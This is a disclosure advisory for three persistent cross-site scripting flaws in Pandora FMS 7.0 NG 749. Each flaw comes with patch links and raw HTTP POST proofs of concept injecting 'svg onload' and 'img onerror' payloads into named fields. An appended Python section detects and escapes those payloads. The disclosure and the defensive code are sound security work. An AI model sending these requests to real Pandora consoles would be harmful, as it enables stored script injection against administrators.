# Exploit Title: Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities
# Date: 11-14-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 749
# Tested on: Ubuntu 18.04

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "Edit OS" functionality of Pandora FMS.
# Vulnerable Parameters : name, description
# Patch Link : https://github.com/pandorafms/pandorafms/commit/58f521e8b570802fa33c75f99586e5b01b06731b

# POC
POST /pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1

name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&icon=0&id_os=0&action=save&update_button=Create

############################################################################################################

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "Private Enterprise Numbers" functionality of Pandora FMS.
# Vulnerable Parameters : manufacturer, description
# Patch Link : https://github.com/pandorafms/pandorafms/commit/b9b94e1382f6e340fd9f3136972cca4373f00eb0

# POC
POST /pandora_console/ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------195778570630678476283866516641
Content-Length: 846
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=templates&sec2=godmode/modules/private_enterprise_numbers
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3

-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="is_new"

1
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="page"

godmode/modules/private_enterprise_numbers
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="method"

add
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="pen"

123
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="manufacturer"

<img src=a onerror=alert(1)>
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="description"

<img src=a onerror=alert(1)>
-----------------------------195778570630678476283866516641--

############################################################################################################

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "Module Template Management" functionality of Pandora FMS.
# Vulnerable Parameters : name, description
# Patch Link : https://github.com/pandorafms/pandorafms/commit/e833c318a5a91d6d709a5b266c1245261b4c0e70

# POC
POST /pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 316
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1

id_np=0&valid-pen=1%2C2%2C4%2C9%2C11%2C63%2C111%2C116%2C123%2C171%2C173%2C188%2C207%2C674%2C2021%2C2636%2C3375%2C3861%2C6486%2C6574%2C8072%2C10002%2C12356%2C13062%2C14988%2C19464%2C41112%2C52627%2C53526%2C&name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&pen=&action_button=Create
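The three requests above deliver the same class of payload through two body encodings (urlencoded and multipart). As an added example (not Pandora FMS code or the advisory author's), the following Python decodes both encodings, picks out the parameters the advisory names as sinks for each console page, and returns the HTML-escaped value that a fixed template should emit instead of the raw stored string. The page-to-field map, the markup heuristic and the multipart boundary are assumptions of this example.

```python
import html
import re
from email.parser import BytesParser
from urllib.parse import parse_qs

# Fields the advisory lists as stored-XSS sinks, keyed by the console page
# (the sec2= value of the form, or the "page" field of the ajax.php request).
SENSITIVE_FIELDS = {
    "godmode/setup/os": {"name", "description"},
    "godmode/modules/private_enterprise_numbers": {"manufacturer", "description"},
    "godmode/modules/manage_module_templates": {"name", "description"},
}

# Heuristic (an assumption of this example): anything that looks like the start of
# an HTML tag. Ordinary values such as "Linux" or "Stock kernel" never match.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]")

def parse_form_body(content_type: str, body: bytes) -> dict:
    """Decode either body encoding used in the advisory into {field: value}."""
    if content_type.startswith("multipart/form-data"):
        # Wrap the raw body in a minimal MIME message so the stdlib parser splits the parts.
        msg = BytesParser().parsebytes(
            b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
        return {part.get_param("name", header="content-disposition"):
                part.get_payload(decode=True).decode()
                for part in msg.get_payload()}
    return {k: v[0] for k, v in parse_qs(body.decode(), keep_blank_values=True).items()}

def flag_markup(page: str, fields: dict) -> dict:
    """Return each sensitive field of this page whose value contains markup, mapped to
    the HTML-escaped form a fixed template must emit instead of the raw value."""
    return {name: html.escape(fields[name], quote=True)
            for name in SENSITIVE_FIELDS.get(page, ())
            if name in fields and MARKUP_RE.search(fields[name])}

def multipart_body(boundary: str, fields: dict) -> bytes:
    """Build a multipart/form-data body (used only to construct sample input here)."""
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
             for k, v in fields.items()]
    return ("".join(parts) + f"--{boundary}--\r\n").encode()

# Constructed samples: the parameter values from the advisory's first and second requests.
OS_BODY = (b"name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E"
           b"&icon=0&id_os=0&action=save&update_button=Create")
PEN_BOUNDARY = "constructedboundary1234"  # assumed boundary, not the advisory's
PEN_BODY = multipart_body(PEN_BOUNDARY, {
    "is_new": "1", "page": "godmode/modules/private_enterprise_numbers", "method": "add",
    "pen": "123", "manufacturer": "<img src=a onerror=alert(1)>",
    "description": "<img src=a onerror=alert(1)>"})
```

Running flag_markup over the two sample bodies yields name/description for the OS form and manufacturer/description for the PEN form, each with angle brackets converted to entities; benign values such as "Linux" are returned untouched.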